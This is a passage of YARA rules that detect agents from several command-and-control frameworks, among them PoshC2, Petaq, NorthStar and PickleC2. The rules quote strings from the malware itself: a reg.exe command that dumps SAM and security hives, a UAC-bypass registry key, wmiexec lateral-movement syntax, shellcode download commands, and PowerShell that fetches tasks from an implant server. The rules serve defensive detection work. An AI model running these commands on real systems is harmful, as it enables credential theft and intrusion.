      sha256_5 = "eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3"
   strings:
      $x1  = "template: no template %q associated with template %qtls: received a session ticket with invalid lifetimetls: server selected uns" ascii
      $x2  = "tls: client certificate used with invalid signature algorithmtls: server sent a ServerHello extension forbidden in TLS 1.3tls: u" ascii
      $x3  = "bytes.Buffer: reader returned negative count from Readcertificate is not valid for requested server name: %wcryptobyte: Builder " ascii
      $x4  = "runtime: GetQueuedCompletionStatus returned invalid mode= tls: server changed cipher suite after a HelloRetryRequesturlPartNoneu" ascii
      $x5  = "runtime: netpoll: PostQueuedCompletionStatus failed (errno= tls: initial handshake had non-empty renegotiation extensiontls: no " ascii
      $x6  = "invalid network interface nameinvalid pointer found on stacklength mismatch in decodeArraylength mismatch in ignoreArraylooking " ascii
      $s7  = "oot of negative numberstream error: stream ID %d; %vsync: inconsistent mutex statesync: unlock of unlocked mutextext/javascript;" ascii
      $s8  = "non-IPv4 addressnon-IPv6 addressntrianglelefteq;object is remotepacer: H_m_prev=proxy-connectionquoted-printablereflect mismatch" ascii
      $s9  = "= flushGen  for type  gfreecnt= pages at  runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen  sweepgen= target" ascii
      $s10 = "y typereflect: Out of non-func type rpc: error executing template:rpc: service already defined: runqputslow: queue is not fullru" ascii
      $s11 = "nt array or slice: length exceeds input size (%d elements)http2: Transport conn %p received error from processing frame %v: %vht" ascii
      $s12 = "pc= throwing= until pc=%!Weekday(%s|%s%s|%s, bound = , limit = /dev/stdin01234567891220703125127.0.0.1:6103515625: parsing :auth" ascii
      $s13 = "[originating from goroutine _html_template_rcdataescaper_html_template_srcsetescaper_html_template_urlnormalizerasn1: string not" ascii
      $s14 = "supported versions satisfy MinVersion and MaxVersionnet/http: invalid Cookie.Domain %q; dropping domain attributerpc.Register: a" ascii
      $s15 = "sched={pc: /* %s */null  but progSize  nmidlelocked= on zero Value out of range  procedure in  to finalizer  untyped args $htmlt" ascii
      $s16 = "internal/poll.(*ioSrv).ExecIO" fullword ascii
      $s17 = "os.Executable" fullword ascii
      $s18 = "rof.dll" fullword ascii
      $s19 = "runtime: GetQueuedCompletionStatus returned invalid mode= tls: server changed cipher suite after a HelloRetryRequesturlPartNoneu" ascii
      $s20 = "i32.dll" fullword ascii
   condition:
      hash.sha256(0, filesize) == "d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967" or
      hash.sha256(0, filesize) == "0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e" or
      hash.sha256(0, filesize) == "195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c" or
      hash.sha256(0, filesize) == "cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd" or
      hash.sha256(0, filesize) == "eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3" or
      pe.imports("kernel32.dll", "DuplicateHandle") and
      pe.imports("kernel32.dll", "SwitchToThread") and
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      ((uint16(0) == 0x5a4d and filesize < 22000KB and (1 of ($x*) and 4 of them)) or (all of them))
}

rule DeimosC2_Unix {
   meta:
      description = "DeimosC2 - screengrab.elf, shadowdump.elf"
      sha256_1 = "cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050"
      sha256_2 = "2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7"
   strings:
      $x1  = "fmt: unknown base; can't happenhttp2: connection error: %v: %vin literal null (expecting 'l')in literal null (expecting 'u')in l" ascii
      $x2  = "bytes.Buffer: reader returned negative count from Readcertificate is not valid for requested server name: %wcryptobyte: Builder " ascii
      $x3  = "59604644775390625: missing method ; SameSite=StrictCOMPRESSION_ERRORCirculateNotify {ConfigureNotify {DiacriticalAcute;Diacritic" ascii
      $x4  = "strings.Builder.Grow: negative countsyntax error scanning complex numbertls: keys must have at least one keytls: server did not " ascii
      $x5  = "adding nil Certificate to CertPoolbad scalar length: %d, expected %dcan't evaluate field %s in type %scan't handle %s for arg of" ascii
      $x6  = "runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangeslice bounds out of range [:%x] with" ascii
      $x7  = "IDS_Trinary_OperatorInsufficient StorageLeftArrowRightArrow;MAX_HEADER_LIST_SIZEMeroitic_HieroglyphsNegativeMediumSpace;NotGreat" ascii
      $x8  = "s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrconv: internal error, rest " ascii
      $x9  = "tls: client certificate contains an unsupported public key of type %Ttls: handshake message of length %d bytes exceeds maximum o" ascii
      $x10 = "lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnablestrict-trans" ascii
      $x11 = "got CONTINUATION for stream %d; expected stream %dhttp: putIdleConn: CloseIdleConnections was calledhttp: suspiciously long trai" ascii
      $x12 = "%s slice too big: %d elements of %d bytes34694469519536141888238489627838134765625MapIter.Next called on exhausted iteratorTime." ascii
      $x13 = ", RecursionAvailable: .localhost.localdomain/etc/apache/mime.types/etc/ssl/ca-bundle.pem/lib/time/zoneinfo.zip/usr/local/share/c" ascii
      $x14 = "runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: stat underflow: val runtime: sudog with non-nil cruntime: sum" ascii
      $x15 = "173472347597680709441192448139190673828125867361737988403547205962240695953369140625MapIter.Value called on exhausted iteratorPR" ascii
      $x16 = "gob: cannot encode nil pointer of type heapBitsSetTypeGCProg: small allocationhttp: putIdleConn: keep alives disabledinvalid ind" ascii
      $x17 = "HumpEqual;IP addressKeep-AliveKeyPress {KharoshthiLeftArrow;LeftFloor;Leftarrow;LessTilde;ManichaeanMellintrf;Message-IdMinusPlu" ascii
      $x18 = "checkdead: no m for timercontext deadline exceedederror decoding []byte: %sexpected string; found %sexplicit tag has no childhtt" ascii
      $x19 = "template: no template %q associated with template %qtls: received a session ticket with invalid lifetimetls: server selected uns" ascii
      $x20 = "file descriptor in bad statefindrunnable: netpoll with pgcstopm: negative nmspinninggeneral SOCKS server failuregob: cannot enco" ascii
   condition:
      hash.sha256(0, filesize) == "cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050" or
      hash.sha256(0, filesize) == "2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7" or
      uint16(0) == 0x457f and filesize < 23000KB and
      1 of ($x*)
}


- GrimReaper C2

import "hash"
import "pe"

rule GrimReaperC2_Agent {
   meta:
      description = "GrimReaperC2 - Agent_x64.exe, Agent_x86.exe"
      sha256_1 = "83c92e978a094fbc4d2c5f8d009a28da54c5677c1d55af61c3c2e2c33ea712af"
      sha256_2 = "b059fc8cce2a0ca169dd3aae76c13d43a3fee0821a2bbb5b0d8b97d067c6eb08"
   strings:
      $s1  = "        <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s2  = "    -> CommandId: %u" fullword ascii
      $s3  = "[+] agent is identifying.." fullword ascii
      $s4  = "InternetReadFile Error: (%lu)" fullword ascii
      $s5  = "Error reading file %ld" fullword ascii
      $s6  = "Couldn't get file size" fullword ascii
      $s7  = "[+] Sending %lu bytes: %.*s" fullword ascii
      $s8  = "[+] Got task ID: %u" fullword ascii
      $s9  = "HttpSendRequest Error: (%lu)" fullword ascii
      $s10 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s11 = "fetching commands.." fullword ascii
      $s12 = "got token: %s" fullword ascii
      $s13 = "Error writting file." fullword ascii
      $s14 = "Opening file %s for %s" fullword ascii
      $s15 = "writing to file" fullword ascii
      $s16 = "closing file" fullword ascii
      $s17 = "listing files" fullword ascii
      $s18 = "Mozilla/5.0" fullword ascii
      $s19 = "connect" fullword ascii
   condition:
      hash.sha256(0, filesize) == "83c92e978a094fbc4d2c5f8d009a28da54c5677c1d55af61c3c2e2c33ea712af" or
      hash.sha256(0, filesize) == "b059fc8cce2a0ca169dd3aae76c13d43a3fee0821a2bbb5b0d8b97d067c6eb08" or
      pe.imports("advapi32.dll", "OpenProcessToken") and
      pe.imports("wininet.dll", "InternetConnectW") and
      pe.imports("kernel32.dll", "FindNextFileW") and
      pe.imports("kernel32.dll", "CreateToolhelp32Snapshot") and
      pe.imports("kernel32.dll", "Process32NextW") and
      ((uint16(0) == 0x5a4d and filesize < 60KB and (8 of them)) or (all of them))
}


- FlyingAFalseFlag C2

import "hash"
import "pe"

rule FlyingAFalseFlag_Exchanger {
   meta:
      description = "FlyingAFalseFlag - Exchanger_x64.exe, Exchanger_x86.exe"
      sha256_1 = "6a5605da5f7207b1b14b798e9428c2310633664eed53ce7bdb39a6847eff6609"
      sha256_2 = "c337983b7eefbea3cc02e4d011398292ccbd475ba932ced40603a4a9a3927032"
   strings:
      $s1  = "api-ms-win-core-synch-l1-2-0.dll" fullword wide
      $s2  = "<GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" fullword ascii
      $s3  = "<DeleteItem DeleteType=\"HardDelete\" xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" fullword ascii
      $s4  = "<soap:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=" ascii
      $s5  = "://schemas.microsoft.com/exchange/services/2006/types\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"" ascii
      $s6  = "[+] Found vault creds: %s / " fullword ascii
      $s7  = "[!] Failed to execute tasking" fullword ascii
      $s8  = "        <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s9  = "[+] Auto-hide rule '%s' is ready" fullword ascii
      $s10 = "mail@<domain.com>" fullword ascii
      $s11 = "%localappdata%\\Microsoft\\Outlook\\" fullword wide
      $s12 = "<AutoDiscoverSMTPAddress>" fullword ascii
      $s13 = "<m:MailboxSmtpAddress>**MAILBOX**</m:MailboxSmtpAddress>" fullword ascii
      $s14 = "[+] Got tasking... executing." fullword ascii
      $s15 = "<soap:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=" ascii
      $s16 = "[!] Failed to create rule '%s'" fullword ascii
      $s17 = "[!] Failed to beacon to '%s'" fullword ascii
      $s18 = "</m:GetInboxRules>" fullword ascii
      $s19 = "  </soap:Header>" fullword ascii
   condition:
      hash.sha256(0, filesize) == "6a5605da5f7207b1b14b798e9428c2310633664eed53ce7bdb39a6847eff6609" or
      hash.sha256(0, filesize) == "c337983b7eefbea3cc02e4d011398292ccbd475ba932ced40603a4a9a3927032" or
      pe.imports("kernel32.dll", "FindNextFileW") and
      pe.imports("kernel32.dll", "TerminateProcess") and
      pe.imports("wininet.dll", "InternetConnectA") and
      pe.imports("advapi32.dll", "LookupAccountSidA") and
      ((uint16(0) == 0x5a4d and filesize < 300KB and (8 of them)) or (all of them))
}


- Mike C2

import "pe"
import "hash"

rule MikeC2_DllHijack {
   meta:
      description = "MikeC2 - DllHijack.dll"
      sha256 = "28bcbcf21baaf1310fbda8a9e2d34d480d1f8e5f65d87abba6326a71565d1714"
   strings:
      $s1  = "DllHijack.dll" fullword ascii
      $s2  = "        <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s3  = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s4  = "tester" fullword ascii
      $s5  = ".rdata$voltmd" fullword ascii
      $s6  = "  </trustInfo>" fullword ascii
      $s7  = "      </requestedPrivileges>" fullword ascii
      $s8  = "      <requestedPrivileges>" fullword ascii
      $s9  = ";);.;A;a;~;" fullword ascii
      $s10 = "=K=T=]=k=t=" fullword ascii
      $s11 = "SVWj h" fullword ascii
      $s12 = "2*2K2P2i2n2{2" fullword ascii
      $s13 = "1%171}1" fullword ascii
      $s14 = "0#0/0G0W0]0t0" fullword ascii
      $s15 = "646C6L6Y6o6" fullword ascii
      $s16 = "5 535A5G5M5S5Y5_5f5m5t5{5" fullword ascii
   condition:
      hash.sha256(0, filesize) == "28bcbcf21baaf1310fbda8a9e2d34d480d1f8e5f65d87abba6326a71565d1714" or
      pe.imports("kernel32.dll", "WriteProcessMemory") and
      pe.imports("kernel32.dll", "CreateToolhelp32Snapshot") and
      pe.imports("kernel32.dll", "CreateRemoteThread") and
      uint16(0) == 0x5a4d and filesize < 30KB and
      8 of them
}

rule MikeC2_MikeDrop {
   meta:
      description = "MikeC2 - MikeDrop.exe"
      sha256 = "933241f02ef81bef5f6b51ce3e5b3dbf242c829f899f64d2f10b0bad668a6424"
   strings:
      $s1  = "http://kali.host/MikeC2.exe" fullword wide
      $s2  = "MikeDrop.exe" fullword wide
      $s3  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s4  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s5  = ".NETFramework,Version=v4.7.2" fullword ascii
      $s6  = ".NET Framework 4.7.2" fullword ascii
      $s7  = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36" fullword wide
      $s8  = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s9  = "UserName: {0}" fullword wide
      $s10 = "Domain UserName: {0}" fullword wide
      $s11 = "MikeC2.Program" fullword wide
      $s12 = "MikeDrop" fullword wide
      $s13 = "      <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s14 = "DoMikeC2" fullword ascii
      $s15 = "user-agent" fullword wide
      $s16 = "Program" fullword ascii
      $s17 = "Console" fullword ascii
      $s18 = "  </trustInfo>" fullword ascii
      $s19 = "Invoke" fullword ascii
   condition:
      hash.sha256(0, filesize) == "933241f02ef81bef5f6b51ce3e5b3dbf242c829f899f64d2f10b0bad668a6424" or
      uint16(0) == 0x5a4d and filesize < 20KB and
      8 of them
}


- Nimbo C2

import "hash"
import "pe"

rule Nimbo_C2_WinBin_agent {
   meta:
      description = "Nimbo-C2 - agent.dll"
      sha256 = "46be6cee13305cd4175e75a37308478ff48685665bbb062b8c665d672f0f4b0d"
   strings:
      $x1 = "yIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyTok" ascii
      $x2 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersio" ascii
      $s3 = "@System.Drawing.dll" fullword ascii
      $s4 = "@System.dll" fullword ascii
      $s5 = "agent_execution_path_windows__config_30" fullword ascii
      $s6 = "agent_execution_path_linux__config_32" fullword ascii
      $s7 = "@unable to get interface of CorRuntimeHost" fullword ascii
      $s8 = "@System.CodeDom.Compiler.CompilerParameters" fullword ascii
      $s9 = "execute_encoded_powershell__windowsZutilsZclr_5" fullword ascii
      $s10 = "3674214126" ascii
      $s11 = "@unable to get interface of CLRRuntimeHost" fullword ascii
      $s12 = "@Ws2_32.dll" fullword ascii
      $s13 = "2969576475" ascii
      $s14 = "@GenerateExecutable" fullword ascii
      $s15 = "sleep_on_execution__config_28" fullword ascii
      $s16 = "queryProcessCycleTime" fullword ascii
      $s17 = "queryIdleProcessorCycleTime" fullword ascii
      $s18 = "@unable to start CorRuntimeHost" fullword ascii
      $s19 = "SIGSEGV: Illegal storage access. (Attempt to read from nil?)" fullword ascii
   condition:
      hash.sha256(0, filesize) == "46be6cee13305cd4175e75a37308478ff48685665bbb062b8c665d672f0f4b0d" or
      pe.imports("kernel32.dll", "VirtualProtect") and
      uint16(0) == 0x5a4d and filesize < 1000KB and
      1 of ($x*) and 4 of them
}

rule Nimbo_C2_UnixBin_agent {
   meta:
      description = "Nimbo-C2 - agent.so"
      sha256 = "9fb7870c7c1dc8d2dd61ba77e34efe580ad0151c9b59b201b17a45a211d8ff49"
   strings:
      $s1 = "agent_execution_path_linux__config_32" fullword ascii
      $s2 = "agent_execution_path_windows__config_30" fullword ascii
      $s3 = "AWAVAUA" fullword ascii
      $s4 = "sleep_on_execution__config_28" fullword ascii
      $s5 = "SIGSEGV: Illegal storage access. (Attempt to read from nil?)" fullword ascii
      $s6 = "SIGPIPE: Pipe closed." fullword ascii
      $s7 = "reportUnhandledError__system_2855" fullword ascii
      $s8 = "reportUnhandledErrorAux__system_2752" fullword ascii
      $s9 = "getBigChunk__system_4510" fullword ascii
      $s10 = "getBottom__system_3996" fullword ascii
      $s11 = "getActiveStack__system_5401" fullword ascii
      $s12 = "cellSetGet__system_4918" fullword ascii
      $s13 = "doOperation__system_5296" fullword ascii
      $s14 = "getHugeChunk__system_4525" fullword ascii
      $s15 = "intSetGet__system_4180" fullword ascii
      $s16 = "sweep__system_5710" fullword ascii
      $s17 = "NTIhttpheaders__FbZeO4trJhT2CCJ9aLxejqw_" fullword ascii
      $s18 = "getDiscriminant__system_3619" fullword ascii
      $s19 = "getFileHandle__systemZio_228" fullword ascii
      $s20 = "getOccupiedMem__system_1936" fullword ascii
   condition:
      hash.sha256(0, filesize) == "9fb7870c7c1dc8d2dd61ba77e34efe580ad0151c9b59b201b17a45a211d8ff49" or
      uint16(0) == 0x457f and filesize < 600KB and
      8 of them
}


- NorthStar C2

import "hash"

rule NorthStarC2 {
   meta:
      description = "NorthStarC2 - NorthstarStager.exe"
      sha256 = "f7f92158b53e6bcd8b2eb293e4802e2759c1943096e2da3d03486f36f053801c"
   strings:
      $s1  = "reg.exe save hklm\\sam c:\\temp\\sam.save & reg.exe save hklm\\security c:\\temp\\security.save & reg.exe save hklm\\system c:" wide
      $s3  = "SystemHealthCheck.exe" fullword wide
      $s4  = "processCommand" fullword ascii
      $s5  = "NorthstarStager.exe" fullword wide
      $s6  = "_SAMDUMP.zip" fullword wide
      $s7  = "login.php" fullword wide
      $s8  = "_getProcesses" fullword ascii
      $s9  = "bypassuac" fullword wide
      $s10 = "Probably bypassed check new connection" fullword wide
      $s11 = "samdump" fullword wide
      $s12 = "set_UseShellExecute" fullword ascii
      $s13 = "        <requestedExecutionLevel  level=\"asInvoker\" uiAccess=\"false\" />" fullword ascii
      $s14 = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />" fullword ascii
      $s15 = "uploadfile" fullword wide
      $s16 = "getjuice.php" fullword wide
      $s17 = "_samDump" fullword ascii
      $s18 = "Cmd mode enabled, all commands will be redirect to CMD. Response delay is : " fullword wide
      $s19 = "Command not found, you may need to enable CMD mode <enablecmd or enable cmd>" fullword wide
      $s20 = "SOFTWARE\\Classes\\mscfile\\shell\\open\\command" fullword wide
   condition:
      hash.sha256(0, filesize) == "f7f92158b53e6bcd8b2eb293e4802e2759c1943096e2da3d03486f36f053801c" or
      uint16(0) == 0x5a4d and filesize < 70KB and
      8 of them
}


- Petaq C2

import "hash"

rule PetaqImplant {
   meta:
      description = "PetaqImplant - PetaqImplant.exe"
      sha256 = "8ed63f7ea1a79dbf2cc9a338feff1dd4491a9daac38d4c86f67d7211783ae272"
   strings:
      $x1  = "    exec cmd.exe /c dir" fullword wide
      $x2  = "    execthread cmd.exe /c dir" fullword wide
      $x3  = "    lateralmovement wmiexec domain=galaxy username=administrator password=Password3 host=10.0.0.1 command=\"powershell " fullword wide
      $x4  = "    lateralmovement wmiexec domain=DOMAIN username=USER password=PASSWORD host=REMOTEHOST command=\"COMMANDTORUN\"" fullword wide
      $s5  = "Invalid credentials error may occur if the logged on user has no access to remote server IPC$. Try this before linking 'net use " wide
      $s6  = "The process is running with the payload injected." fullword wide
      $s7  = "    exec-sharpassembly url http://127.0.0.1/test.exe" fullword wide
      $s8  = "    exec-shellcode url http://127.0.0.1/Shellcode.bin ARCH64 T1" fullword wide
      $s9  = "    exec-shellcode url http://127.0.0.1/Shellcode.bin ARCH32 T2" fullword wide
      $s10 = "Execute a command/binary:" fullword wide
      $s11 = "* link smb://192.168.1.1/NamedPipeName" fullword wide
      $s12 = "Setting the startup information for the process to inject." fullword wide
      $s13 = "    download c:\\windows\\temp\\1.txt" fullword wide
      $s14 = "Execute Shellcode:" fullword wide
      $s15 = "Pushing the payload to the process memory." fullword wide
      $s16 = "Compile & Execute .NET source code:" fullword wide
      $s17 = "PetaqImplant.exe" fullword wide
      $s18 = "* transmit SESSIONID COMMAND" fullword wide
      $s19 = "shellcode" fullword ascii
      $s20 = "ExecShellcodeBridge" fullword ascii
   condition:
      hash.sha256(0, filesize) == "8ed63f7ea1a79dbf2cc9a338feff1dd4491a9daac38d4c86f67d7211783ae272" or
      uint16(0) == 0x5a4d and filesize < 200KB and
      1 of ($x*) and 4 of them
}


- Pickle C2

import "hash"

rule PickleC2 {
   meta:
      description = "PickleC2 - powershell.ps1"
      sha256 = "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1"
   strings:
      $s1  = "function Execute($key,$ip,$port,$implant_name,$sleep_time){" fullword ascii
      $s2  = "Execute $key $ip $port $implant_name $sleep_time" fullword ascii
      $s3  = "    $LocalIPs = \"LocalIPs(\" + (([System.Net.Dns]::GetHostByName($NULL).AddressList | Select IPAddressToString | findstr \".*.*" ascii
      $s4  = "        $process.startInfo.UseShellExecute = $false" fullword ascii
      $s5  = "    $Hostname = \"Machine_Name(\"+ [System.Net.Dns]::GetHostByName($NULL).Hostname + \")\"" fullword ascii
      $s6  = "            $data = (Invoke-WebRequest -UseBasicParsing -Uri $file_download -Method 'POST').Content" fullword ascii
      $s7  = "    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" fullword ascii
      $s8  = "    $LocalIPs = \"LocalIPs(\" + (([System.Net.Dns]::GetHostByName($NULL).AddressList | Select IPAddressToString | findstr \".*.*" ascii
      $s9  = "        $process.StandardOutput.ReadToEnd() + $process.StandardError.ReadToEnd() " fullword ascii
      $s10 = "            $cmd = \"cmd.exe\"" fullword ascii
      $s11 = "    $file_download = \"ht\" + 'tp:' + \"//\" + $ip + \":$port/task/$implant_name/file.ret\"" fullword ascii
      $s12 = "        elseif ($binary -eq \"execute\"){" fullword ascii
      $s13 = " -join ',').replace('IPAddressToString,-----------------,','').replace(\" \",\"\") + \")\"" fullword ascii
      $s14 = "            $cmd = \"powershell.exe\"" fullword ascii
      $s15 = "function Decrypt-String($key, $encryptedStringWithIV) {" fullword ascii
      $s16 = "        $task_req = (Invoke-WebRequest -UseBasicParsing -Uri $task -Method 'GET').Content" fullword ascii
      $s17 = "    $task = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/task/$implant_name\"" fullword ascii
      $s18 = "    $result = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/result/$implant_name\"" fullword ascii
      $s19 = "        $process.startInfo.RedirectStandardError = $true" fullword ascii
      $s20 = "            $results = Encrypt-String $key \"Downloaded\"" fullword ascii
   condition:
      hash.sha256(0, filesize) == "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1" or
      uint16(0) == 0x7566 and filesize < 20KB and
      8 of them
}


- Posh C2

import "hash"
import "pe"

rule PoshC2_Csc {
   meta:
      description = "PoshC2 - csc.exe"
      sha256 = "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa"
   strings:
      $s1  = "csc.exe" fullword ascii
      $s2  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s3  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s4  = "Microsoft.CodeAnalysis" fullword ascii
      $s5  = "lpThreadId" fullword ascii
      $s6  = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s7  = "      <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s8  = "lpAddress" fullword ascii
      $s9  = "Protection" fullword ascii
      $s10 = "Program" fullword ascii
      $s11 = "lpStartAddress" fullword ascii
      $s12 = "RefSafetyRulesAttribute" fullword ascii
      $s13 = "flNewProtect" fullword ascii
      $s14 = "lpflOldProtect" fullword ascii
      $s15 = "  </trustInfo>" fullword ascii
      $s16 = "EmbeddedAttribute" fullword ascii
      $s17 = "dwStackSize" fullword ascii
      $s18 = "#REPLACEME64#" fullword wide
      $s19 = "#REPLACEME32#" fullword wide
      $s20 = "System.Runtime.CompilerServices" fullword ascii
      $s21 = "FromBase64String" fullword ascii
   condition:
      hash.sha256(0, filesize) == "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa" or
      uint16(0) == 0x5a4d and filesize < 20KB and
      8 of them
}

rule PoshC2_DynamicCode {
   meta:
      description = "PoshC2 - DynamicCode.exe"
      sha256 = "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f"
   strings:
      $s1  = "DynamicCode.exe" fullword ascii
      $s2  = "Dynamic Code executed successfully" fullword wide
      $s3  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s4  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s5  = "Microsoft.CodeAnalysis" fullword ascii
      $s6  = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s7  = "      <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s8  = "Program" fullword ascii
      $s9  = "Console" fullword ascii
      $s10 = "RefSafetyRulesAttribute" fullword ascii
      $s11 = "  </trustInfo>" fullword ascii
      $s12 = "EmbeddedAttribute" fullword ascii
      $s13 = "PoshC2DynamicCode" fullword ascii
      $s14 = "System.Runtime.CompilerServices" fullword ascii
      $s15 = "System" fullword ascii
      $s16 = "      </requestedPrivileges>" fullword ascii
   condition:
      hash.sha256(0, filesize) == "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f" or
      uint16(0) == 0x5a4d and filesize < 10KB and
      8 of them
}

rule PoshC2_Fcomm {
   meta:
      description = "PoshC2 - fcomm.exe"
      sha256 = "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c"
   strings:
      $s1  = "fcomm.exe" fullword ascii
      $s2  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s3  = "ParseCommandLineArgs" fullword ascii
      $s4  = "run-dll-background" fullword wide
      $s5  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s6  = "HostInfo" fullword ascii
      $s7  = "GetCurrentTasking" fullword ascii
      $s8  = "objContents" fullword ascii
      $s9  = "get_Actioned" fullword ascii
      $s10 = "CreateEncryptionAlgorithm" fullword ascii
      $s11 = "run-dll" fullword wide
      $s12 = "run-exe Core.Program Core " fullword wide
      $s13 = "initialised" fullword ascii
      $s14 = "loadmodule" fullword wide
      $s15 = "[!] This is not implemented yet in FComm implant types." fullword wide
      $s16 = "Microsoft.CodeAnalysis" fullword ascii
      $s17 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s18 = "SafeFileRead" fullword ascii
      $s19 = "FCommConnect" fullword ascii
      $s20 = "GzipCompress" fullword ascii
   condition:
      hash.sha256(0, filesize) == "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c" or
      uint16(0) == 0x5a4d and filesize < 40KB and
      8 of them
}

rule PoshC2_Pbind {
   meta:
      description = "PoshC2 - pbind.exe"
      sha256 = "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383"
   strings:
      $s1  = "pbind.exe" fullword ascii
      $s2  = "[+] Running task in background, run get-bg to get background output." fullword wide
      $s3  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s4  = "ParseCommandLineArgs" fullword ascii
      $s5  = "run-dll-background" fullword wide
      $s6  = "[*] Only run one task in the background at a time per implant." fullword wide
      $s7  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s8  = "#REPLACEPBINDPIPENAME#" fullword wide
      $s9  = "CreateEncryptionAlgorithm" fullword ascii
      $s10 = "run-dll" fullword wide
      $s11 = "run-exe Core.Program Core " fullword wide
      $s12 = "$[-] Cannot read from pipe" fullword wide
      $s13 = "loadmodule" fullword wide
      $s14 = "[-] No output" fullword wide
      $s15 = "Microsoft.CodeAnalysis" fullword ascii
      $s16 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s17 = "GzipCompress" fullword ascii
      $s18 = "#REPLACEKEY#" fullword wide
      $s19 = "Error loading modules {0}" fullword wide
      $s20 = "run-exe-background" fullword wide
      $s21 = "Invoke" fullword wide
   condition:
      hash.sha256(0, filesize) == "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383" or
      uint16(0) == 0x5a4d and filesize < 40KB and
      8 of them
}

rule PoshC2_Sharp_Powershell_Runner {
   meta:
      description = "PoshC2 Sharp_Powershell_Runner.exe"
      sha256 = "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259"
   strings:
      $s1  = "Sharp_Powershell_Runner.exe" fullword ascii
      $s2  = "basepayload" fullword ascii
      $s3  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s4  = "get_SessionStateProxy" fullword ascii
